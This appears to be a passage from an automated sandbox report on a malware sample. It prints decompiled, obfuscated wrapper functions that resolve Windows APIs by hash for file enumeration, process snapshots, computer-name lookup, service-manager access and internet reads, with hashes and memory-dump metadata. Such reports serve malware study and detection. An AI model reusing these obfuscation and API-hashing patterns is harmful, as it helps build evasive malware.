                                          • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction ID: 5d995ea7630725837acdc99d8627ad3ff9cdb75dcbb2e3a096d8fe34c137cd10
                                          • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction Fuzzy Hash: C9F04FB0C11208FFDB08DFA0E94689EBFB8EB40300F20819CE409A7260E7715F559F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Executed Functions

                                          C-Code - Quality: 58%
                                          			E006F75AE(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t43;
                                          				intOrPtr* _t51;
                                          				void* _t52;
                                          				signed int _t54;
                                          				signed int _t55;
                                          				void* _t63;
                                          				void* _t64;
                                          
                                          				_t64 = __edx;
                                          				E006F602B(_t43);
                                          				_v8 = 0x98b5;
                                          				_v8 = _v8 >> 9;
                                          				_t54 = 0x5f;
                                          				_v8 = _v8 / _t54;
                                          				_v8 = _v8 + 0xffff1c63;
                                          				_v8 = _v8 ^ 0xffff635b;
                                          				_v12 = 0x5016;
                                          				_v12 = _v12 + 0xffff6b9b;
                                          				_t55 = 0x41;
                                          				_v12 = _v12 / _t55;
                                          				_v12 = _v12 ^ 0x03f03403;
                                          				_t51 = E007007A9(0x93576eb5, 0x12e6675d, _t55, _t55, 0x110);
                                          				_t52 =  *_t51(_a36, _a12, _t64, _a20, _a32, 0, _a8, _a24, __ecx, __edx, 0, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _t63, __ecx, __ecx); // executed
                                          				return _t52;
                                          			}













                                          APIs
                                          • CryptDecodeObjectEx.CRYPT32(00001A16,3FEE891D,00000000,FFFF309F,FEFFE01A,00000000,?,01C46047), ref: 006F765C
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CryptDecodeObject
                                          • String ID:
                                          • API String ID: 1207547050-0
                                          • Opcode ID: 48f2b61483b0afb25e5a152f65d42c1f563eb6edafd256c2ccbd9b0086fc00f6
                                          • Instruction ID: a89292fdf5a199d7fefa67f9df21fb2badbd10d28f7ef3836ca882df8b70b7c3
                                          • Opcode Fuzzy Hash: 48f2b61483b0afb25e5a152f65d42c1f563eb6edafd256c2ccbd9b0086fc00f6
                                          • Instruction Fuzzy Hash: 0221087290060CFFDF05CF94DC46DDE7F76EB49324F148148FA18661A0D7B69A61AB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 71%
                                          			E006F109C(void* __ecx, WCHAR* __edx, struct _WIN32_FIND_DATAW* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				void* _t30;
                                          				void* _t38;
                                          				signed int _t40;
                                          				WCHAR* _t46;
                                          
                                          				_push(_a16);
                                          				_t46 = __edx;
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				E006F602B(_t30);
                                          				_v16 = _v16 & 0x00000000;
                                          				_v24 = 0xf19a8;
                                          				_v20 = 0x58c643;
                                          				_v12 = 0xbcc6;
                                          				_v12 = _v12 | 0xbb59ffff;
                                          				_v12 = _v12 ^ 0xbb59839d;
                                          				_v8 = 0x5dbd;
                                          				_v8 = _v8 << 0xd;
                                          				_t40 = 0x3f;
                                          				_v8 = _v8 / _t40;
                                          				_v8 = _v8 * 0x1f;
                                          				_v8 = _v8 ^ 0x05c44d1b;
                                          				E007007A9(0xce5de7ff, 0x9164b7cc, _t40, _t40, 0x264);
                                          				_t38 = FindFirstFileW(_t46, _a4); // executed
                                          				return _t38;
                                          			}













                                          APIs
                                          • FindFirstFileW.KERNEL32(?,BB59839D), ref: 006F112B
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileFindFirst
                                          • String ID:
                                          • API String ID: 1974802433-0
                                          • Opcode ID: 0fd23be9f3eba847a5a9bdd4d091bd485d62c5ec83e6e683a4ca1e9cfb5b8d80
                                          • Instruction ID: 2833ff0a0e778c1700799acb56a24678d55fc28fba086e9778bf4457788f5c4f
                                          • Opcode Fuzzy Hash: 0fd23be9f3eba847a5a9bdd4d091bd485d62c5ec83e6e683a4ca1e9cfb5b8d80
                                          • Instruction Fuzzy Hash: 821157B5D01208FBDF04EFA8D90A9DEBFB6EF45314F208198E9086B251D7B54B249B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 52%
                                          			E0070023A(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, intOrPtr _a12, long _a16, DWORD* _a20) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t25;
                                          				int _t31;
                                          				void* _t37;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a20);
                                          				_t37 = __ecx;
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E006F602B(_t25);
                                          				_v12 = 0x4c1d;
                                          				_v12 = _v12 ^ 0x5ad90362;
                                          				_v12 = _v12 ^ 0x5ad955af;
                                          				_v8 = 0xc5f7;
                                          				_v8 = _v8 * 0x75;
                                          				_v8 = _v8 ^ 0x98520be0;
                                          				_v8 = _v8 + 0xd998;
                                          				_v8 = _v8 ^ 0x98094817;
                                          				E007007A9(0xb92c1268, 0x1f801b8, __ecx, __ecx, 0x1c9);
                                          				_t31 = InternetReadFile(_t37, _a8, _a16, _a20); // executed
                                          				return _t31;
                                          			}









                                          APIs
                                          • InternetReadFile.WININET(00000000,2CD2473D,0003F015,FFEAC835), ref: 007002BC
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileInternetRead
                                          • String ID:
                                          • API String ID: 778332206-0
                                          • Opcode ID: 5aea17a31f83cfee10962f094a32e89ed49328cc982311645bc2611183f53528
                                          • Instruction ID: e98caee041750c67ac29b1349b43deb0a0e854c74273d9df42a6a2816dc44841
                                          • Opcode Fuzzy Hash: 5aea17a31f83cfee10962f094a32e89ed49328cc982311645bc2611183f53528
                                          • Instruction Fuzzy Hash: 50014C75901208FFEF45EF94D9068DEBFB9EF45314F108188F90466261D7729F61AB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E006F1C88(int _a12) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _v24;
                                          				intOrPtr _v28;
                                          				void* _t28;
                                          				signed int _t29;
                                          
                                          				_v28 = 0x4309a9;
                                          				asm("stosd");
                                          				_t29 = 0x31;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_v12 = 0x7af7;
                                          				_v12 = _v12 + 0x2003;
                                          				_v12 = _v12 ^ 0x000083a5;
                                          				_v8 = 0xa138;
                                          				_v8 = _v8 << 8;
                                          				_v8 = _v8 / _t29;
                                          				_v8 = _v8 ^ 0x00030e85;
                                          				E007007A9(0xf2bcf6a3, 0x9164b7cc, _t29, _t29, 0x45);
                                          				_t28 = CreateToolhelp32Snapshot(_a12, 0); // executed
                                          				return _t28;
                                          			}










                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(?,00000000), ref: 006F1CF3
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 3332741929-0
                                          • Opcode ID: ea0f0127b5065ca251a00853203831dc196477c93da7ac2d986631f05f845638
                                          • Instruction ID: 68c55c71bdf03de0f4acf2f8e245a611d70fcc5f54f6e55e25240f323c65c46c
                                          • Opcode Fuzzy Hash: ea0f0127b5065ca251a00853203831dc196477c93da7ac2d986631f05f845638
                                          • Instruction Fuzzy Hash: 22F01971E01208FBFB04DFA8CD4A69EBBB6EF94704F208099A5006B291DBB55F158A91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 42%
                                          			E006F5A52(WCHAR* __ecx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _v24;
                                          				intOrPtr _v28;
                                          				void* _t25;
                                          				void* _t31;
                                          				WCHAR* _t37;
                                          
                                          				_t37 = __ecx;
                                          				_push(0);
                                          				_push(_a24);
                                          				_push(_a20);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(0);
                                          				_push(0);
                                          				_push(__ecx);
                                          				E006F602B(_t25);
                                          				_v28 = 0x354aea;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_v8 = 0x4733;
                                          				_v8 = _v8 << 0xb;
                                          				_v8 = _v8 + 0xffffa4b2;
                                          				_v8 = _v8 >> 0xc;
                                          				_v8 = _v8 ^ 0x00006f5b;
                                          				_v12 = 0x6e5;
                                          				_v12 = _v12 ^ 0x21b9cf62;
                                          				_v12 = _v12 ^ 0x21b9d5f6;
                                          				E007007A9(0xfc7e7fb7, 0x1f801b8, __ecx, __ecx, 0x1ad);
                                          				_t31 = InternetOpenW(_t37, _a24, 0, 0, 0); // executed
                                          				return _t31;
                                          			}











                                          APIs
                                          • InternetOpenW.WININET(00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0CD25E5E), ref: 006F5AE1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: InternetOpen
                                          • String ID: J5
                                          • API String ID: 2038078732-3088381744
                                          • Opcode ID: 7c15cf55018e347f4ace21a93f9c9c926ac753e269a0466785618c49b19088fb
                                          • Instruction ID: 7550e5c382ccda6953eec96be1209e4798b8e6bd28c3002e36d84a37f66a8182
                                          • Opcode Fuzzy Hash: 7c15cf55018e347f4ace21a93f9c9c926ac753e269a0466785618c49b19088fb
                                          • Instruction Fuzzy Hash: 55113C7290060CFFEB05DF98DD859DFBB79EF54358F104098FA0562120D3B64E659BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 62%
                                          			E006F2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t30;
                                          				void* _t39;
                                          				signed int _t41;
                                          				signed int _t42;
                                          
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(0);
                                          				_push(0);
                                          				E006F602B(_t30);
                                          				_v12 = 0x5e3c;
                                          				_t41 = 0x63;
                                          				_v12 = _v12 / _t41;
                                          				_t42 = 0x2f;
                                          				_v12 = _v12 / _t42;
                                          				_v12 = _v12 ^ 0x000064be;
                                          				_v8 = 0x74da;
                                          				_v8 = _v8 | 0xfefeeaea;
                                          				_v8 = _v8 >> 0xc;
                                          				_v8 = _v8 ^ 0x000fb531;
                                          				E007007A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                          				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                          				return _t39;
                                          			}










                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 006F29DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID: <^
                                          • API String ID: 1889721586-3203995635
                                          • Opcode ID: c55c8693578de0a15b64fe4e162e7219b95c9f74affb71a64b93f36a3bebe02f
                                          • Instruction ID: ca49cc186a24874a8e9dd37eb638a22a582d058c2f3682b599a27c4a55f591cd
                                          • Opcode Fuzzy Hash: c55c8693578de0a15b64fe4e162e7219b95c9f74affb71a64b93f36a3bebe02f
                                          • Instruction Fuzzy Hash: 8D018072A00108BFEB14DF95DC0A8DFBFB6EF45310F108088F508A6250D7B65F619B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E006FC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				void* _t29;
                                          				intOrPtr* _t33;
                                          				void* _t34;
                                          
                                          				E006F602B(_t29);
                                          				_v28 = 0x4fe02f;
                                          				_v24 = 0x232390;
                                          				_v20 = 0xf8460;
                                          				_v16 = 0;
                                          				_v12 = 0xf625;
                                          				_v12 = _v12 >> 6;
                                          				_v12 = _v12 >> 0xa;
                                          				_v12 = _v12 + 0xffffcc6f;
                                          				_v12 = _v12 ^ 0xffffa5b6;
                                          				_v8 = 0xe5cd;
                                          				_v8 = _v8 + 0xffffae4d;
                                          				_v8 = _v8 | 0xf8bbefe7;
                                          				_v8 = _v8 ^ 0xf8bbcc9a;
                                          				_t33 = E007007A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                          				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                          				return _t34;
                                          			}













                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 006FC762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FolderPath
                                          • String ID: /O
                                          • API String ID: 1514166925-1923427199
                                          • Opcode ID: 30da3a07f34f73dd2d7e05b570dca88aea51d71bd043760bee17983db85881fe
                                          • Instruction ID: dd0eea230056572eb473f0df6e18c6c0daa3df0761a2dde7f723cd6a2fbc1d49
                                          • Opcode Fuzzy Hash: 30da3a07f34f73dd2d7e05b570dca88aea51d71bd043760bee17983db85881fe
                                          • Instruction Fuzzy Hash: BF1122B290122DBBCB259F94DD498EFBEB9EF05714F108188B90962210D7714A659BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E006FF74E(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t28;
                                          				intOrPtr* _t35;
                                          				void* _t36;
                                          				signed int _t38;
                                          				void* _t44;
                                          				void* _t45;
                                          
                                          				_t45 = __edx;
                                          				E006F602B(_t28);
                                          				_v8 = 0x515c;
                                          				_v8 = _v8 + 0xc7b4;
                                          				_t38 = 0xc;
                                          				_v8 = _v8 / _t38;
                                          				_v8 = _v8 >> 4;
                                          				_v8 = _v8 ^ 0x000000a5;
                                          				_v12 = 0xe7ac;
                                          				_v12 = _v12 * 3;
                                          				_v12 = _v12 ^ 0xe245e609;
                                          				_v12 = _v12 ^ 0xe24720e8;
                                          				_t35 = E007007A9(0xea0af15d, 0x7a94c48d, _t38, _t38, 0x20);
                                          				_t36 =  *_t35(0, _t45, _a4, 0, __edx, _a4, _a8, _a12, _a16, _t44, __ecx, __ecx); // executed
                                          				return _t36;
                                          			}












                                          APIs
                                          • ObtainUserAgentString.URLMON(00000000,00000000,E24720E8), ref: 006FF7D1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AgentObtainStringUser
                                          • String ID: G
                                          • API String ID: 2681117516-4236931613
                                          • Opcode ID: 70969eb82c61d59ffbc36551d611cf02090b92ff9991390446fddbbc1e7583c1
                                          • Instruction ID: de5cf91fb3bea798d144b2f008652d7316fb4325879f7076a627beac4b0b7001
                                          • Opcode Fuzzy Hash: 70969eb82c61d59ffbc36551d611cf02090b92ff9991390446fddbbc1e7583c1
                                          • Instruction Fuzzy Hash: 6A015771900208FBEB04DF94DD0AA9EBFB5EF85310F208188F50866290E6B55B20DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 76%
                                          			E006F76F7(struct tagPROCESSENTRY32W* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				void* _t28;
                                          				void* _t35;
                                          				signed int _t37;
                                          				struct tagPROCESSENTRY32W* _t43;
                                          
                                          				_push(_a8);
                                          				_t43 = __ecx;
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E006F602B(_t28);
                                          				_v16 = _v16 & 0x00000000;
                                          				_v24 = 0x5756b4;
                                          				_v20 = 0x17430f;
                                          				_v12 = 0x6271;
                                          				_t37 = 0x43;
                                          				_v12 = _v12 / _t37;
                                          				_v12 = _v12 ^ 0x00004051;
                                          				_v8 = 0x9292;
                                          				_v8 = _v8 + 0x9a70;
                                          				_v8 = _v8 << 0xb;
                                          				_v8 = _v8 * 0x3d;
                                          				_v8 = _v8 ^ 0x3dcb9719;
                                          				_t35 = E007007A9(0x5538536e, 0x9164b7cc, _t37, _t37, 0x1b8);
                                          				Process32FirstW(_a8, _t43); // executed
                                          				return _t35;
                                          			}













                                          APIs
                                          • Process32FirstW.KERNEL32(00000000,?,?,?,?,?,?,?,00000BF7), ref: 006F7780
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FirstProcess32
                                          • String ID: nS8U
                                          • API String ID: 2623510744-2564412997
                                          • Opcode ID: 753496f1b75fe5d5e09ae3fe2fb076b385ae7b42944af084fd65dc5bf96fddcd
                                          • Instruction ID: 9dc8b071e4baa91c06ca8dc26cc31ae2171195057edf3fa02a9277806aa4c957
                                          • Opcode Fuzzy Hash: 753496f1b75fe5d5e09ae3fe2fb076b385ae7b42944af084fd65dc5bf96fddcd
                                          • Instruction Fuzzy Hash: CD0169B5D01208FBDB04DF94D90A9DEBFB5EF40314F208089E8186B251E7B55B249B81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E006F1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				void* _t33;
                                          				struct HINSTANCE__* _t40;
                                          				signed int _t42;
                                          
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				E006F602B(_t33);
                                          				_v16 = _v16 & 0x00000000;
                                          				_v24 = 0x1b2eda;
                                          				_v20 = 0x33a3b7;
                                          				_v12 = 0x98c;
                                          				_v12 = _v12 + 0xb426;
                                          				_v12 = _v12 + 0x5beb;
                                          				_t42 = 0x63;
                                          				_v12 = _v12 / _t42;
                                          				_v12 = _v12 ^ 0x00000fce;
                                          				_v8 = 0x120e;
                                          				_v8 = _v8 + 0xfffffcb8;
                                          				_v8 = _v8 + 0xffffefaa;
                                          				_v8 = _v8 >> 5;
                                          				_v8 = _v8 ^ 0x07ff9a02;
                                          				E007007A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                          				_t40 = LoadLibraryW(_a12); // executed
                                          				return _t40;
                                          			}












                                          APIs
                                          • LoadLibraryW.KERNEL32(0033A3B7), ref: 006F1096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: [
                                          • API String ID: 1029625771-3431493590
                                          • Opcode ID: 73a3d58754cdd9a79437ead089af7a0f70b398c09ce0aea4ead113eb7dba5844
                                          • Instruction ID: 587de7aef1136b13a0e4d14e584ee3088e41f238e0c91bac3239a2f418fbb1e6
                                          • Opcode Fuzzy Hash: 73a3d58754cdd9a79437ead089af7a0f70b398c09ce0aea4ead113eb7dba5844
                                          • Instruction Fuzzy Hash: F5016DB6D0130CFBDF04DF94C94A6DEBBB1EF54318F108188F51466291D7B19B649B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E006F602C(void* __ecx, CHAR* __edx, DWORD* _a4, intOrPtr _a8) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				void* _t23;
                                          				int _t29;
                                          				CHAR* _t34;
                                          
                                          				_push(_a8);
                                          				_t34 = __edx;
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E006F602B(_t23);
                                          				_v16 = _v16 & 0x00000000;
                                          				_v28 = 0x56a9ae;
                                          				_v24 = 0x46a5f8;
                                          				_v20 = 0x71462f;
                                          				_v8 = 0x2cb4;
                                          				_v8 = _v8 + 0xdc6b;
                                          				_v8 = _v8 * 0x25;
                                          				_v8 = _v8 ^ 0x0026370c;
                                          				_v12 = 0x2021;
                                          				_v12 = _v12 ^ 0x8c534c3d;
                                          				_v12 = _v12 ^ 0x8c530eb3;
                                          				E007007A9(0xbd983dde, 0x9164b7cc, __ecx, __ecx, 0x16f);
                                          				_t29 = GetComputerNameA(_t34, _a4); // executed
                                          				return _t29;
                                          			}













                                          APIs
                                          • GetComputerNameA.KERNEL32(?,8C530EB3,?,?,?,?,?,?,0000007A), ref: 006F60B2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ComputerName
                                          • String ID: /Fq
                                          • API String ID: 3545744682-1299280358
                                          • Opcode ID: d2b01d404bd79484d67768b9f36fce1e26be8233a3316e4eaad5ede2e67fc524
                                          • Instruction ID: 5966c971216788094b4e71c1a53ec5b67ecd980920b5e1644b8d3dfe1cb288ed
                                          • Opcode Fuzzy Hash: d2b01d404bd79484d67768b9f36fce1e26be8233a3316e4eaad5ede2e67fc524
                                          • Instruction Fuzzy Hash: 45015AB1C0120CFBDB04EFA4C94A9EEBFB4EF41314F108189E8086B251D3B54B649B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 62%
                                          			E006F595A(void* __ecx, void* __edx, struct _WIN32_FIND_DATAW* _a4, intOrPtr _a8) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t22;
                                          				int _t27;
                                          				void* _t33;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a8);
                                          				_t33 = __edx;
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E006F602B(_t22);
                                          				_v8 = 0xecfb;
                                          				_v8 = _v8 >> 5;
                                          				_v8 = _v8 + 0x8346;
                                          				_v8 = _v8 + 0xffffe2f9;
                                          				_v8 = _v8 ^ 0x000008ac;
                                          				_v12 = 0x34e0;
                                          				_v12 = _v12 >> 0xf;
                                          				_v12 = _v12 ^ 0x1d0c124c;
                                          				_v12 = _v12 ^ 0x1d0c2b7f;
                                          				E007007A9(0xe8880df4, 0x9164b7cc, __ecx, __ecx, 0x196);
                                          				_t27 = FindNextFileW(_t33, _a4); // executed
                                          				return _t27;
                                          			}









                                          APIs
                                          • FindNextFileW.KERNEL32(?,1D0C2B7F), ref: 006F59CE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileFindNext
                                          • String ID: 4
                                          • API String ID: 2029273394-293933855
                                          • Opcode ID: 7c87f46dbf01ac71fdd96b1192808780aa717a036f6e3d3bbce4727d036999bd
                                          • Instruction ID: 9386a35c7849b9afea5ea55fe5569f338665ad6af7dbcd7d48f1d879135b4d22
                                          • Opcode Fuzzy Hash: 7c87f46dbf01ac71fdd96b1192808780aa717a036f6e3d3bbce4727d036999bd
                                          • Instruction Fuzzy Hash: 5C014B76D01208FBEB14DFA4C84A8DEBE78EF41354F108188F80867250D7B65F249B92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 66%
                                          			E00704F7D(void* __ecx, void* __edx, void* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t17;
                                          				int _t24;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E006F602B(_t17);
                                          				_v12 = 0xddd8;
                                          				_v12 = _v12 * 0x48;
                                          				_v12 = _v12 ^ 0x003e66d8;
                                          				_v8 = 0xcb35;
                                          				_v8 = _v8 ^ 0x7b88573c;
                                          				_v8 = _v8 * 0x59;
                                          				_v8 = _v8 ^ 0xf27e4a21;
                                          				E007007A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                          				_t24 = CloseHandle(_a4); // executed
                                          				return _t24;
                                          			}








                                          APIs
                                          • CloseHandle.KERNEL32(003E66D8), ref: 00704FE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true
                                          • Associated: 00000013.00000002.2341892617.00000000006F0000.00000004.00000001.sdmp
                                          • Associated: 00000013.00000002.2341918985.000000000070C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: {#lm
                                          • API String ID: 2962429428-1564096886
                                          • Opcode ID: 7df0185c2930fb0200a486f9c33d29b23fc7f0daa0c3c6090cb6242b0ea75d03
                                          • Instruction ID: 8aae62e17bd9586afd767884eb545bb771224710aee2626a314b92568e48ad66
                                          • Opcode Fuzzy Hash: 7df0185c2930fb0200a486f9c33d29b23fc7f0daa0c3c6090cb6242b0ea75d03
                                          • Instruction Fuzzy Hash: 94F037B081120CFFDF04DFA4DA4689EBFBAEB41310F208299E804AB250D3715B509B54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 43%
                                          			E00707955(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, WCHAR* _a36, void* _a44, intOrPtr _a52) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				WCHAR* _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				void* _t41;
                                          				short _t47;
                                          
                                          				_push(_a52);
                                          				_t47 = __ecx;
                                          				_push(0);
                                          				_push(_a44);
                                          				_push(0);
